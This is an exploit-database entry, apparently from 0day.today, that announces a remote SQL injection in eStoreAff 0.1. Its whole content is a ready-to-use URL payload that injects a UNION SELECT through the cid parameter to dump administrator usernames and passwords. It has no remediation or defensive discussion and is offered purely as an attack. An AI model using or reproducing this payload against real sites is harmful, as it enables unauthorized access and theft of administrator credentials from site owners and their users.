id: 3495
date: 07/31/2008
title: eStoreAff 0.1 (cid) Remote SQL Injection Vulnerability
author: Mr.SQL
cves: 

======================================================
eStoreAff 0.1 (cid) Remote SQL Injection Vulnerability
======================================================



###############################################################
#################### Viva IslaM Viva IslaM ####################
##
## Remote SQL Injection Vulnerability
##
## eStoreAff V0.1 ( index.php menu )
##
## www.estoreaff.com
########################
########################
##
## -[[: Exploite :]]-
##
##  www.Target.com/index.php?menu=showcat&cid=-1+union+select+010,CONCAT_WS(0x3a,user,pass)MrSQL,010+from+admin--
##
########################
########################

#######################################################################################################



#  0day.today [2023-03-26]  #